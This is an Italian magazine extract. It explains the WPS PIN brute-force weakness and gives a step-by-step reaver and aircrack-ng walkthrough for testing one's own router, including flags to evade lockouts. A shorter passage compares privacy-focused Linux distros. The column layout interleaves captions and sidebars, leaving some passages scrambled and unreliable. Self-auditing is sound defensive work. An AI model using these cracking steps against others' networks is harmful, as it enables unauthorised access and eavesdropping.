Access Point in circolazione oggi è violabile con
una dozzina di ore di tempo a disposizione e una
scheda Wi-Fi da trenta euro (e spesso questa non serve
neanche). Scommetto che il vostro vicino ha la dozzina di
ore a disposizione e probabilmente anche i trenta euro,
quindi meglio verificare se il vostro router è vulnerabile e,
nel caso, correre ai ripari.

34

Cosa diavolo stai dicendo, Willis?
Molti di voi si ricorderanno i tempi neanche troppo remoti
in cui molti router venivano venduti già preconfigurati
per essere acceduti senza nessun tipo di crittografia
né di credenziali, come opzione predefinita; e di come,
di conseguenza, andare in giro a cercare accessi a sbafo
a Internet fosse diventato uno sport nazionale. Purtroppo,
grazie all’introduzione relativamente recente di WPS e alla
sua pessima, scellerata implementazione in moltissimi Access
Point, lo scenario attuale non è troppo dissimile da quello
di qualche anno fa. Oggi accedere a una rete che non
è la propria è meno banale di allora e richiede qualche ora
di tempo; quindi è impensabile che qualcuno di passaggio
sotto la vostra finestra possa attaccarsi e farsi gli affari propri
(e già che c’è anche i vostri) al volo approfittando della vostra
rete. Chi però ha sempre accesso al vostro segnale Wi-Fi,
può fare con calma. E se pensate che “tanto tutti miei vicini
di casa sono rimbambiti ed è già molto se sono capaci
di far partire il videoregistratore”, tenete a mente che molte
schede Wi-Fi specializzate hanno una portata
significativamente maggiore di quelle in dotazione nei vari
dispositivi mobili, perciò il campo non è limitato solo alle
vostre immediate pertinenze… chissà chi abita nel condominio
di fronte. Iniziamo con il vedere cos’è WPS, e come mai
è così deleterio.
Cos’è WPS?
WPS sta per Wi-Fi Protected Setup, anche se in origine
avrebbe dovuto chiamarsi Wi-Fi Simple Config. Il nome
originale sarebbe stato sicuramente più indicato, anche
perché a tutti gli effetti lo scopo di questa invenzione
è, tuttora, quello di semplificare l’accesso alle reti Wi-Fi
da parte degli utenti meno abili con la tecnologia, e così
facendo aumentare la diffusione della tecnologia wireless.
Al contempo, tuttavia, si voleva mantenere un livello
di sicurezza ragionevole per fare in modo che la
semplificazione non andasse a discapito della sicurezza.
Come si dice in questi casi: EPIC FAIL.
Perché WPS è così gramo?
L’idea originale aveva anche senso. Semplificare la fase
iniziale di associazione tra il client e l’Access Point usando
un PIN, in maniera simile a quella che avviene tra dispositivi
Bluetooth, per intenderci. Usando un PIN corretto, il router
non avrebbe garantito l’accesso tout court alla rete,
ma avrebbe trasferito al client tutti i parametri per
la configurazione sicura, solitamente WPA2, per utilizzare
I pericoli del wireless
Fig.1 La rete
di casa del
vicinato. BSSID
e SSID sono stati
oscurati per
motivi di privacy,
salvo la rete
dell’autore,
che ora non
è più accessibile,
per inciso
il miglior livello di crittografia attualmente esistente da quel
momento in avanti (WPA2, appunto). Va da sé che se
si riesce a fregare WPS, ci si fa passare tutti i parametri
dal router, e allora addio sicurezza di WPA2 (per inciso,
ai fini di questo articolo le differenze tra router Wi-Fi
e Access Point – AP – sono trascurabili, perciò useremo
entrambi in maniera intercambiabile). Perché semplificare
le cose permettendo di usare solo otto numeri, in una fase
iniziale? Pensate ai vari dispositivi mobili con tastiere software
piccole, dove non è difficile sfiorare il tasto sbagliato
inavvertitamente. Inserire una password di venti caratteri
sarebbe parecchio scomodo. Peggio ancora, pensate
alle console per videogiochi che non hanno una tastiera,
e immaginatevi a inserire venti caratteri con un bel controller
della Nintendo Wii. Magari passando dalla schermata
con le lettere a quella con i numero a quella con i simboli.
Quindi l’idea non era neanche male.
Un PIN non è effettivamente
facile da indovinare?
Otto cifre decimali significa cento milioni di numeri possibili
da provare. Se WPS fosse stato implementato meglio,
come vedremo dopo, sarebbe stato estremamente difficile,
pressoché impossibile da violare. Uno dei problemi tuttavia,
il primo di molti, è che in realtà le cifre considerate sono solo
sette, non otto. L’ultima è una checksum, e viene calcolata
a partire dai primi sette. Una checksum è una sorta di sigillo
in ceralacca per verificare che il PIN trasmesso sia stato
ricevuto correttamente. Non che sia quello giusto: solo che
la trasmissione da una parte all’altra sia stata integra e non
si sia alterata (in gergo “corrotta”) durante la trasmissione
radio dal vostro dispositivo al router. Questo può anche avere
senso (ma forse, a dirla tutta, no: non bastava respingere
un PIN corrotto come qualsiasi PIN non valido?), ma di fatto
restringe il numero di combinazioni possibili a dieci milioni.

Un caso felice
Per fortuna qualcuno distribuisce router con
WPS implementato nel modo corretto. Il
router AVM Fritz!Box 7390, per esempio,
consente di disattivare WPS tout court, o
molto semplicemente, di tenerlo acceso solo
quando lo si desidera, per soli due minuti, e
cambiando PIN ogni volta che lo si è
utilizzato. Era così difficile? Perché ancora
oggi, a più di due anni dalla pubblicazione
della scoperta della falla, tantissimi router
felicemente accesi in tutta la nazione non si
comportano in questo modo?
Un router con un buon firmware implementa
WPS mantenendo il PIN attivo solo per pochi
minuti e cambiandolo dopo ogni utilizzo.
In questo modo WPS diventa davvero un modo
comodo per configurare apparati Wi-Fi,
senza svilire la sicurezza

35
 Protezione Generale
Che è un numero ancora abbastanza alto per provare numeri
a caso (provare tutte le possibili combinazioni per indovinare
quella giusta si chiama attacco a forza bruta). Se fosse possibile
provare un PIN al secondo, servirebbero circa tre mesi per
provarne dieci milioni. Che diciamocelo, non sarebbe neanche
un tempo geologico: ma le cose stanno ben peggio. I PIN WPS
vengono controllati… dividendoli in due parti. Prima vengono
verificate le prime quattro cifre. Se l’operazione va a buon fine,
si passa al riconoscimento delle tre che rimangono. Questo vuol
dire che bastano al massimo diecimila tentativi, nel caso più
sfortunato possibile, per trovare le prime quattro cifre, e solo
altri mille per le ultime tre. Siamo passati da cento milioni
di combinazioni possibili a undicimila in tutto nell’arco di un solo
paragrafo, non male.
Perché?
Anche questa volta l’idea originale non era del tutto sbagliata.
Quella di verificare il PIN dividendolo in due, intendo
(per la checksum giuro di non capire come se la siano
inventata). Perché? Perché stiamo prendendo sempre e solo
in considerazione uno scenario: quello dove il server (l’Access
Point) deve verificare che il client (cioè il vostro portatile)
Fig.2 I primi sia autorizzato ad accedere, ovvero conosca il PIN. Sembra
PIN provati lapalissiano. Nella testa di chiunque l’obiettivo è far riconoscere
da reaver. il proprio smartphone dal dannato Access Point e finalmente
Inizialmente avere Internet a una velocità decente e senza limiti.
vengono usati Non si pensa quasi mai che sarebbe utile anche fare in modo
i PIN più comuni,
che lo smartphone riconosca l’Access Point.
dopodiché reaver
inizia a verificarli
tutti in ordine Ma come, se è lì davanti
finché non ha agli occhi di tutti!
trovato quello L’Access Point vero ce l’avete lì davanti. Lo smartphone
giusto (o qualsiasi dispositivo Wi-Fi, naturalmente), però, ascolta
segnali che arrivano da ovunque lì intorno, e non ha gli occhi
per vedere la scatoletta che state guardando voi. Qualsiasi
segnale che arrivi presentandosi con il nome che vi aspettate
(per esempio “ANTANI_Network”) per lui è potenzialmente
buono. Come fate a essere sicuri, allora, che il vostro
smartphone non stia comunicando con un altro Access Point,
e non il vostro? Uno creato ad arte per farvi sì connettere,
salvo poi leggere tonnellate di affari vostri? Magari anche
password molto importanti, se siete disattenti agli avvisi
del browser sulla correttezza dei certificati SSL. Gli Access
Point siffatti sono definiti Rogue Access Point, e sono tutt’altro
che fantascienza. Perciò è fondamentale che anche il client
verifichi che stia davvero parlando con il router con cui crede
di parlare, e non con qualcuno che lo impersona. Per farlo,
anche il router manda il suo PIN al client. Non così, nudo
e crudo, naturalmente; altrimenti basterebbe fare un solo
tentativo sbagliato, per ricevere la risposta corretta. Questo
farebbe precipitare WPS oltre il ridicolo. Invece, sia il client
che l’AP trasferiscono il PIN usando una funzione di hashing
con un salt di 128 bit. Anche in questo caso, però,
se il router inviasse il PIN tutto intero, sarebbe facile fare
un attacco a forza bruta offline per trovare il PIN a partire
dall’hash. Per risolvere (si fa per dire) il problema, il router
ne manda solo mezzo, per farsi autenticare a sua volta
dal client; e invia la seconda parte solo dopo che anche
il client ha dimostrato di conoscere tutti i pezzi del PIN.
Naturalmente, facendo così, si introduce il problema appena
descritto; i numeri da provare si riducono di parecchio. Uno dei
problemi di fondo è che otto cifre sono poche, tout court. L’altro
è che molti router hanno un PIN statico, e attivo 24h/24.
Un minimo di storia
Qualcuno si è accorto di come stavano le cose. Stefan
Viehböck (@sviehb) è stato il primo a pubblicare, alla fine
del 2011, la propria scoperta (ebbene sì. Questo problema
è noto da un paio di anni abbondanti, il che rende ancora più
tragico il fatto che la vulnerabilità sia tanto diffusa ancora
oggi) e ha pubblicato un tool per sfruttare la falla, wpscrack.
Dopo che il problema è stato reso noto, Craig Heffner
di Tactical Network Solutions (www.tacnetsol.com)
ha rivelato di essere già al corrente della cosa da un annetto,
e ha deciso di rilasciare al mondo il codice del proprio
strumento, già bell’e pronto, per sfruttare la debolezza
dei router. Lo strumento si chiama reaver; al momento
è quello più efficace tra i programmi rilasciati per questo
scopo, e lo useremo tra pochi minuti.

Passiamo alla pratica

È arrivato il momento di verificare se il vostro router allo
stato attuale delle cose è suscettibile a questo problema
(e in questo caso non dovreste scartare l’ipotesi che lo stiate

Reaver non ha funzionato. Sono al sicuro?

Non troppo. Ricordate che anche se il vostro
router si limita a rallentare gli attacchi a forza
bruta, i numeri da provare sono sempre e solo
undicimila, che è un numero molto piccolo.
Con pazienza, ci si arriva. Anche nel caso in cui
reaver non si sia dimostrato in grado di gestire
le risposte WPS del router e di attaccarlo
con successo, non ci sentiamo di dire che
si possa lasciare WPS attivo e dormire tranquilli.
Potrebbe uscire una patch per reaver domani;
inoltre non sapete se con una scheda di rete
diversa avreste ottenuto un altro risultato.
Insomma: undicimila è un numero troppo
piccolo per rischiare, a nostro avviso, di lasciare
WPS aperto a tempo indeterminato, e l’unico
caso in cui ha senso usarlo è quello in cui
lo si attiva per pochi istanti attraverso
un pulsante o da un’interfaccia Web, e poi basta.

36

già condividendo con qualcun altro, a meno che non viviate
veramente lontano da qualsiasi centro abitato). Per mettere
alla prova il router è possibile installare gli strumenti descritti
di seguito (il già citato reaver tra questi, ma non solo)
all’interno di qualsiasi distribuzione, perciò se non volete
usare un Live CD e la vostra distro supporta già tutti
i pacchetti del caso (e i migliori driver per la scheda Wi-Fi)
allora potete tranquillamente usare tutti i programmi descritti
di seguito dall’interno della vostro sistema operativo.
Nelle prossime pagine, tuttavia, descriveremo come forzare
le eventuali vulnerabilità del vostro router usando Kali Linux.
Kali Linux è una distribuzione pensata proprio per
il penetration testing, vale a dire che contiene già tutti
i migliori strumenti e i più diffusi driver per effettuare svariati
tipi di attacchi informatici, siano essi legittimi, come in questo
caso, o meno. La trovate nel lato A del DVD di questo mese:
potete avviare il computer dal DVD e trovarvi così tutto
pronto, senza dover installare niente (tenete a mente che
la password di root è “toor”, senza virgolette). Se avete una
scheda Wi-Fi USB, esterna, potete anche avviare il DVD
all’interno di una macchina virtuale (in questo modo potreste
mantenere il vostro normale sistema operativo in esecuzione
mentre Kali Linux farà il suo lavoro nella virtual machine).
Kali Linux “Live”
Il modo più veloce per poterci mettere al lavoro è quello
di inserire il DVD di questo mese nel lettore, avviare
il computer dal DVD e premere Invio quando appare
la schermata di avvio di Kali Linux, per avviare in modalità
Live, senza installare niente sull’hard disk e lasciare il vostro
computer indisturbato e poterlo ritrovare esattamente come
l’avete lasciato. Se vi steste chiedendo cosa sia la modalità
“Forensic”: avvia la distribuzione senza scalfire neanche
eventuali partizioni di swap presenti sul disco (quelle,
altrimenti, vengono usate per migliorare le prestazioni di Kali,
senza intaccare i filesystem) e non monta automaticamente
nessuna eventuale memoria USB inserita. Nel nostro caso
la modalità predefinita è quella consigliabile. Dopo il boot,
a meno che non vi troviate comodi con il layout americano
della tastiera, la prima operazione da fare è quella
di configurare correttamente la tastiera. Purtroppo è un po’
macchinoso. Cliccate in altro a destra, dove è specificato
il nome utente (cioè root, in questo caso: trattandosi di una
distribuzione orientata alla sicurezza, non ci sarebbe stato
motivo di limitare i privilegi dell’utente predefinito) e cliccate
su System Settings. Quindi selezionate Keyboard. In basso,
cliccate su Layout Settings; quindi sul + in basso a destra,
selezionate Italian e cliccate su Add. Ora, nel pannello
superiore, cliccate su en (la lingua attualmente usata per
il layout della tastiera) per far finalmente apparire it e poter
avere corrispondenza tra quello che c’è scritto sui vostri tasti
e quello che apparirà nel terminale quando li premerete.
La mia scheda wireless:
andrà bene o no?
Il requisito fondamentale è che abbiate una scheda Wi-Fi
in grado di funzionare e trasmettere pacchetti in modalità
monitor. Questa modalità differisce da quella usata
normalmente (detta managed, o station) perché permette
di ascoltare traffico radio proveniente da qualsiasi rete, senza
associarsi a un Access Point. La buona notizia è che buona
parte delle schede integrate nei computer portatili sono
I pericoli del wireless
Fig.3 PIN trovato in circa sette ore. Come vedete, non importa quanto complicata
o lunga sia la vostra passphrase, il router Fastweb è generoso e la fa sapere in giro
lo stesso. Abbiamo nominato Fastweb perché abbiamo avuto un’esperienza diretta,
ma i router che soffrono di questa falla sono svariati
in grado di funzionare in modalità monitor in Linux,
ma questo non è sempre vero. Se fosse questo il vostro caso,
l’unico modo per poter fare il test è quello di procurarvi una
scheda USB esterna pienamente supportata. Ve la caverete
con poche decine di euro, e avrete anche il vantaggio
di poterla usare in una macchina virtuale. Trovate un elenco
di schede supportate (anche PCMCIA e PCI, volendo) qui:
http://bit.ly/1qqDoWF. Per verificare se la vostra scheda
sia compatibile o meno con la modalità monitor, dopo aver
avviato Kali Linux e aver fatto il login in GNOME, aprite
un terminale ed eseguite
airmon-ng
Questo elenca le schede Wi-Fi disponibili. Ogni scheda
wireless ha un etichetta, indicata tra parentesi quadre;
è un identificativo che rappresenta la scheda fisica all’interno
del sistema. A ciascuna scheda fisica possono essere
associate diverse schede logiche, come vedremo tra poco,
vale a dire dei riferimenti usati dal sistema per accedere
al dispositivo fisico vero e proprio. Ecco un output di esempio:
wlan0 Intel 4965/5xxx/6xxx/1xxx iwlwifi - [phy0]
Questo elenca, nell’ordine, il nome logico della scheda come
assegnato da Kali Linux, il tipo di chipset della stessa, il driver
utilizzato in Kali e l’identificativo della scheda fisica.
Ora elencate tutte le proprietà della scheda, sostituendo
nel comando l’identificativo phy0 con quello della vostra
scheda, se differente:
iw phy0 info
L’output normalmente fornito da questo comando
è estremamente verboso; anche se restituisce molte
informazioni interessanti. Per restringerlo a quello che
ci serve possiamo filtrarlo con grep:
iw phy0 info | grep -A 10 “Supported interface modes”
La seconda parte del comando, grep -A 10 “Supported
interface modes” mostra solo la parte che ci interessa, vale
37
 Protezione Generale
Fig.4 Inutile cambiare la password di frequente se qualcuno conosce il vostro
PIN. Basterà specificarlo nella linea di comando di Reaver per avere quella
nuova, dopo tre secondi d’orologio
Quindi, per rielencare gli eventuali processi problematici
rimasti eseguire
airmon-ng check
Ogni processo elencato dal comando precedente avrà
un identificativo numerico, elencato nella colonna PID.
Per ciascun PID, eseguite
kill -9 PID
sostituendo a “PID” il numero specificato. Un modo
alternativo per abilitare la modalità monitor è quello manuale:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Attenzione che il primo e il terzo comando sono ifconfig,
mentre il secondo è iwconfig. Per finire, eseguite quindi
senza argomenti:
iwconfig
per verificare lo stato delle vostre schede, virtuali o meno,
e che alla voce Mode compaia l’agognata scritta “monitor”.
Se avete seguito la seconda strada, non verrà generata
una scheda virtuale (mon0), ma verrà fatto riferimento
direttamente alla stessa wlan0. D’ora in avanti, per semplicità,
la scheda in modalità monitor usata per gli esempi sarà
sempre “mon0”. Modificate questo parametro nei comandi
che seguono a seconda del vostro caso.

a dire, per l’appunto, la lista delle modalità Wi-Fi supportate.
Se “managed” appare nell’elenco, è fatta.
Setup della scheda Wi-Fi
Se la scheda Wi-Fi supporta la modalità monitor, per prima
cosa occorre abilitarla. Ci sono diversi modi per farlo, quello
più comune è utilizzare di nuovo il comando airmon-ng,
questa volta con due argomenti; dovrete utilizzare
l’identificativo logico:
airmon-ng start wlan0
Questo creerà una nuova interfaccia virtuale, chiamata
mon0. Se rieseguite airmon-ng senza argomenti, ora,
vedrete due interfacce logiche per la stessa scheda fisica.
Quando crea l’interfaccia di monitoring, airmon-ng verifica
se nel sistema sono in esecuzione dei processi che possono
interferire con la stessa. L’esito delle operazioni di sniffing
e di cracking WPS dipende molto sia dall’hardware che
dai driver, perciò i risultati possono essere molto variabili.
Abbiamo osservato che in alcuni casi reaver funziona meglio
quando Network Manager è abilitato, per esempio, a dispetto
di quanto indicato da airmon-ng; e viceversa in altri.
Consigliamo di lasciare le cose come stanno, inizialmente,
e in un secondo momento, in caso di insuccesso, di
disattivare network manager con
/etc/init.d/network-manager stop
Trovare il proprio Access Point
Ogni AP è identificato in modo univoco da un codice
chiamato BSSID, che altro non è che l’indirizzo MAC della
scheda wireless dello stesso (ogni scheda di rete ha
un indirizzo, chiamato indirizzo MAC, formato da sei coppie
di cifre esadecimali). Senza entrare troppo nei dettagli degli
“strati” di networking, per ora quello che basta sapere
è che il riferimento inequivocabile al vostro router è il suo
BSSID, non il nome della rete che esso presenta. Quello può
cambiare, e ci possono essere altri router nei paraggi
che presentano un nome identico (per motivi fraudolenti
ma anche perfettamente legittimi, generalmente parlando).
Quindi la prima cosa da fare, è trovare il vostro BSSID.
Per farlo, fate partire una bella scansione del traffico
a portata della vostra scheda:
airodump-ng mon0
e aspettate di veder apparire il nome della vostra rete, sulla
destra (dovrebbero bastare pochi secondi). A sinistra, sulla
stessa linea, apparirà il BSSID che state cercando. Prendete
anche nota del canale (colonna CH), verrà comodo in seguito
(il canale indica la frequenza radio specifica utilizzata).
Fuoco alle polveri
Finalmente è arrivato il momento di utilizzare reaver. Le sue
opzioni sono svariate, e spesso per riuscire a violare il vostro

Una telefonata con un operatore

“Salve. Il router che mi avete dato è bucabile
in una dozzina d’ore. Come si fa a disabilitare WPS?”
“Non è possibile. Deve disabilitare il WiFi.”
“Prego?”
“Eh, sì. Non si può disattivare solo WPS.”
“Mi sta dicendo che tutti i router che distribuite
ai clienti sono bucati di default?”
“Ehm…”
Questa è la versione sintetica di una telefonata
reale. La morale è che ho dovuto spegnere
il Wi-Fi, comprare un router separato e dignitoso,
collegare il nuovo router a quello del mio operatore,
e quindi essere sicuro di far navigare solo chi voglio
io, attraverso la mia rete. Il punto è: perché gli
operatori sanno e non fanno niente? Speriamo che
la diffusione della consapevolezza sulla vulnerabilità
di moltissimi router stimoli produttori e provider a
prendere delle contromisure!

38
 I pericoli del wireless
router (a meno che non sia particolarmente debole,
come la maggior parte dei router Fastweb, ahinoi, incluso
quello dell’autore) occorrono un po’ di pazienza
e di sperimentazione. Il processo è apparentemente aleatorio
non solo perché fortemente dipendente dalla scheda di rete
e dai suoi driver, ma anche, naturalmente, dal comportamento
del vostro router.
Le opzioni indispensabili sono sempre:
-b 00:11:22:33:44:55
con cui specificate il BSSID da attaccare (naturalmente
rimpiazzando i numeri dell’esempio qui sopra con quelli
del vostro router, che avete trovato poco fa);
-i mon0
con cui specificate quale interfaccia utilizzare per provare
l’attacco. Queste due sono imprescindibili. Inoltre, conviene
usare sempre l’opzione -vv che indica a reaver di essere
il più verboso possibile nel suo output, cosa utilissima
per vedere cosa succede strada facendo.
Quindi, il comando base è
reaver -b 00:11:22:33:44:55 -i mon0 -vv
L’output sul router della rete dell’autore è drammatico, come
dimostrato nella Fig.2.

Alcune opzioni
Nel caso mostrato nelle figure di queste pagine, l’attacco
è stato (purtroppo) particolarmente fortunato e facile,
ma a volte può essere necessario sperimentare con diverse
combinazioni di opzioni per poter riuscire a ottenere
un risultato. Alcuni router limitano il numero massimo di PIN
che concedono di provare in un determinato lasso di tempo,
proprio per arginare gli attacchi a forza bruta (per fortuna
qualcuno ci ha pensato!). Tuttavia, spesso è sufficiente
distanziare nel tempo i tentativi per riuscire a procedere
comunque. Con -d 20 indicate a reaver di far passare 20
secondi tra un tentativo e l’altro. Si tratta di un numero
abbastanza alto e che permette comunque di esaurire tutti
i PIN disponibili nell’arco di circa 60 ore, un tempo
sostenibile con un po’ di pazienza. Se doveste incorrere
in un blocco temporaneo di WPS da parte del router, reaver
smetterà di provare nuovi PIN per 60 secondi. Il tempo
da attendere in questo caso può essere specificato
con -l, per esempio per aspettare dieci minuti dopo un lock,
usate -l 600. Ci sono altri flag che possono modificare
il comportamento del programma, per esempio facendo
in modo di utilizzare chiavi Diffie-Hellman piccole
(la comunicazione del PIN al router è cifrata, così da non
poter essere facilmente sniffabile, usando l’algoritmo
suddetto). Utilizzate -S per velocizzare la transazione
(nel nostro caso non abbiamo osservato differenze
apprezzabili, ma potrebbe essere utile su altri router). Un’altra
Fig.5 Alcuni router respingono le immissioni di PIN errate troppo ravvicinate
tra loro, disabilitando WPS per qualche tempo. Tuttavia, basta configurare reaver
in maniera meno ostinata e avere un po’ di pazienza per riuscire a violare anche
questi router. Attenzione quindi!
opzione che potrebbe essere interessante è -L, che specifica
di ignorare il blocco WPS continuando a martellare il router
di richieste (qualora il blocco fosse solo apparente).
Per elencare tutte le opzioni possibili digitate reaver senza
argomenti; la pagina “man” di reaver non è altrettanto completa.
Va per le lunghe!
Se avete bisogno di riavviare il PC e dovete quindi
sospendere il vostro tentativo di “autocrackaggio”, dovete
ricordarvi di salvare i file generati da reaver, per poterli
rimettere dov’erano al prossimo riavvio in Kali Linux.
In questo modo potrete continuare a usare reaver
riprendendo l’attacco a partire dal PIN a cui eravate rimasti.
Nella cartella /etc/reaver troverete i file da salvare.
Potete copiarli usando Nautilus, il file manager di GNOME,
o se lo preferite la linea di comando. Salvateli sull’hard disk
del vostro PC (Kali riconosce automaticamente le partizioni
e le mostra sul desktop, ed è in grado di scrivere anche
su partizioni Windows NTFS all’occorrenza, se usate un PC
con Windows) oppure ancora su una chiave USB, e poi
copiateli di nuovo in /etc/reaver al prossimo riavvio in Kali
Linux, prima di eseguire reaver.

Ho disattivato WPS, e uso WPA2, sono al sicuro!

Quasi. L’unica cosa che rimane da fare ora
per dormire sonni tranquilli sapendo che la vostra
rete è tutta vostra, soltanto vostra, e che la banda
Bassotti starà definitivamente alla larga,
è utilizzare una password seria. Che vuol dire,
soprattutto, lunga, e non basata su una o due
parole di senso compiuto. Anche se è noiosa
da inserire in tutti i vostri dispositivi mobile.
C’è infatti un punto debole anche in WPA2:
lo scambio di informazioni di autenticazione con
il vostro router (handshake), che può venire
catturato (ricordatevelo, è nell’aria!), e anche
se non è in chiaro, una volta ottenuto è possibile
attaccarlo con attacchi basati su dizionario o a forza
bruta per arrivare, da questo, alla password.
Ottenere l’handshake WPA2 è molto facile,
ottenere la password… anche, se è corta
o se è basata su parole di senso compiuto.

39
 Protezione Generale
La distro migliore
per blindare il PC
Siete preoccupati per la vostra privacy? Allora è venuto il momento
di scegliere una distro che la protegga a 360°. Scoprite qual è la migliore
S
ono tanti i casi in cui, per
alcuni motivi particolari,
si consiglia l’uso di una distro
interamente dedicata alla
sicurezza. Abbiamo quindi scelto cinque
diverse soluzioni, ognuna delle quali
presenta pregi e difetti. Tails è forse
il sistema più consolidato, capace di
fornire un accesso a Internet anonimo,
eludendo qualsiasi tipo di censura.
La nostra Ubuntu Privacy Remix (UPR) fornisce
selezione un altrettanto buon livello di anonimato,
JonDo Live-DVD proteggendo al contempo i vostri dati
Qubes OS
Tails personali. Funziona solo in modalità
U
 buntu Privacy Live, crittografa i documenti e li
Remix
Whonix protegge da accessi non richiesti.
Whonix vanta quasi le stesse
40
“Il vincitore non dovrà fornire
solo la massima sicurezza,
ma anche flessibilità e semplicità”
caratteristiche di Tails, ma va oltre
dividendo il flusso di lavoro in due
segmenti: server e workstation. Qubes
OS, invece, utilizza un approccio a
compartimenti che gestisce la sicurezza
su più livelli. Infine, abbiamo preso in
considerazione JonDo Live-DVD che si
rivela una soluzione molto interessante
(nata dalla piattaforma JonDonym,
un anonymiser dedicato alla sicurezza
e alla protezione della privacy). A questo
Modalità del test
In questi anni, i media hanno
puntato la loro attenzione su
PRISM. Il programma di
sorveglianza elettronica ha
sollevato una moltitudine di
dubbi e preoccupazioni sulla
tenuta della privacy e
sull’accesso anonimo a Internet.
Per contrastare la possibilità che
qualcuno ci spii o rubi i nostri
dati, sono quindi nate diverse
distro dedicate alla sicurezza.
In questo confronto abbiamo
deciso di rivisitare l’argomento,
puntando soprattutto su
distribuzioni che proteggono la
privacy. Parleremo delle distro
attualmente in stato di sviluppo
attivo e ci concentreremo sulla
semplicità d’uso, le prestazioni,
l’insieme di caratteristiche e la
documentazione.
proposito, è bene ricordare come
anonimato e sicurezza vadano sempre
di pari passo. Infatti, ognuno di questi
sistemi prende in considerazione diversi
strumenti per lasciare gli hacker fuori
dalla porta. Durante il confronto,
metteremo sotto i riflettori ogni
caratteristica di queste distro, così
da deciderne il vincitore. Esso, oltre
a fornirci la massima sicurezza, dovrà
anche essere flessibile e facile da usare.
 Distribuzioni
Sicurezza
e privacy
Accessibilità
Cosa dovete fare effettivamente per utilizzarle?
T
ails è la distro più famosa di L’immagine deve essere modificata
questo confronto. Ci saremmo tramite l’utility isohybrid. Per farlo,
aspettati di scaricare la ISO è necessario usare questi comandi:
o il corrispondente file da isohybrid tails-i386-1.2.3.iso -h 255 -s 63
memorizzare su una chiavetta USB dd if=tails-i386-1.2.3.iso of=/dev/sdc
ma purtroppo siamo rimasti delusi. Il bs=16M
processo per reperire questa distro, dove /dev/sdc rappresenta l’unità
infatti, è meno semplice del previsto. flash. Il sistema, quindi, si avvia come
qualsiasi altra
distro basata
su Debian.
La procedura per
avviare Whonix
e Qubes OS
è ancora più
complessa.
Il primo, infatti,
si presenta sotto
forma di due
macchine virtuali
di VirtualBox, una
per il Gateway
No, non è SUSE in versione azzurra, ma Ubuntu Privacy e l’altra per la
Remix che dispone di Protected Pangolin Workstation. L’idea
Stato di sviluppo
Privacy e sicurezza oggi, ma cosa vi riserva il futuro?
C
ontare su una distro che nelcome anche i sistemi più solidi
tempo rimarrà aggiornata possano finire nel dimenticatoio
e sviluppata è spesso un e lasciati morire. Non succede
aspetto che viene dato per solo per incuria da parte dei
scontato. Tuttavia non è così, programmatori, ma anche per
perché l’esperienza ci ha insegnatoil sopraggiungere di problemi
e incompatibilità
apparentemente
insormontabili.
A questo punto,
quindi, si decide
di lasciar perdere
e risparmiare
il proprio tempo
dedicandolo
ad altri progetti.
Tails, da questo
punto di vista,
è una delle distro
meglio sviluppate
e supportate.
La frequenza
JonDo Live-DVD conta su aggiornamenti costanti degli
blindate Confronto
a 360°
alla base di questo sistema è fornire
un ambiente isolato da dedicare
all’accesso a Internet. La prima
cosa da fare, quindi, è lanciare
e configurare Whonix Gateway
su una macchina virtuale, dopodiché
accedervi da un’altra VM su cui si
eseguiranno tutte le operazioni.
Il funzionamento non ha dato
problemi, ma siamo sicuri che solo
Verdetto
gli utenti esperti saranno in grado
JonDo Live
di sfruttarlo senza grattacapi. Qubes HHHHH
OS, invece, non dispone di alcuna Qubes OS
sessione Live, permettendo invece HHHHH
la sola installazione. Questa distro Ubuntu
Privacy Remix
è basata su una versione recente
HHHHH
di Fedora con cui condivide lo stesso Tails
installer. Il problema è che richiede HHHHH
risorse piuttosto ingenti per essere Whonix
installata: 32 GB per la partizione HHHHH
di root e almeno 4 GB di RAM. Infine, Solo chi
offre un
Ubuntu Privacy Remix e JonDo Live-
approccio
DVD si sono dimostrate molto facili facile vince.
da avviare.
aggiornamenti non è tra le più
veloci, ma si mantiene costante.
Ubuntu Privacy Remix può a oggi
contare sulla versione 12.04r1
(Protected Pangolin) che garantisce
il supporto per una vasta gamma di
hardware di nuova generazione.
Whonix è un progetto relativamente
nuovo. Iniziato durante il 2012, Verdetto
tutt’oggi riesce a mantenere uno
JonDo Live
sviluppo attivo e aggiornato. Qubes
HHHHH
OS ha un team particolarmente Qubes OS
laborioso che riesce a fornire HHHHH
documentazione alfa e beta, Ubuntu
nonché a rilasciare release Privacy Remix
HHHHH
pubbliche in capo a pochi mesi Tails
di distanza l’una dall’altra. La distro HHHHH
che però vince questa particolare Whonix
sfida è JonDo Live-DVD. HHHHH
I programmatori sembrano aver Aggiornare
costantemente
messo il turbo, tanto da vantare
è proprio
un changelog che viene aggiornato fondamentale.
ogni cinque o dieci giorni!
41
Confronto Distribuzioni blindate
Protezione Generale

Navigazione protetta
Quanto riescono a bloccare durante l’uso su Internet?

L
e distro prese in considerazione fanno È però importante ricordare come l’anonimato politica d’uso delle password più complessa.
del loro meglio per mantenere alta richieda anche di accettare compromessi, Vediamo quindi come si comportano i nostri
la protezione durante la navigazione. come minore velocità di download e una sistemi in questo particolare contesto.

JonDo Live-DVD  HHHHH

JonDo vi permette di navigare in modo anonimo tramite JonDo IP
changerv (anche conosciuto come JonDonym). Si tratta di un Anon
Proxy Java simile a Tor. Come programma per la navigazione, la distro
sfrutta JonDoBrowser basato su Firefox. Questo software utilizza
pseudonimi revocabili e invia le richieste a cascata, mescolando
i flussi di dati di più utenti per nascondere ulteriormente le
informazioni a potenziali spioni. JonDo, seppure possa contare
su un’infrastruttura completamente Open Source, sfrutta piani liberi
e commerciali. Nel primo caso, si possono utilizzare solo le porte
di destinazione 80 e 443 per i protocolli HTTP e HTTPS. Il servizio
premium, invece, fornisce SOCKS con deleghe ulteriori che
consentono un anonimato marcato e maggiore velocità di navigazione.

Qubes OS  HHHHH

Qubes OS porta con sé un ulteriore concetto di isolamento basato
sulla virtualizzazione. Il sistema utilizza Zen hypervisor con istanze
multiple virtualizzate su una versione alterata di Fedora 20.
La distro, infatti, è suddivisa in “domini” e le applicazioni possono
essere seguite su macchine virtuali (AppVM). Il metodo standard per
l’ammonizzazione utilizzato da Qubes OS è TorVM che, connettendosi
a Internet, gestisce Tor. Altri software possono poi essere configurati
per utilizzare questa particolare connessione. Il lato positivo di tale
sistema è che le applicazioni non hanno bisogno di utilizzare
direttamente Tor. Infatti, il traffico viaggia in modalità normale senza
bisogno di componenti aggiuntivi e tutto, da IPv4 TPC ai DNS, viene
instradato da Tor. Lo svantaggio è dato dal fatto che dovrete
configurare tutto manualmente.

Sicurezza dei dati

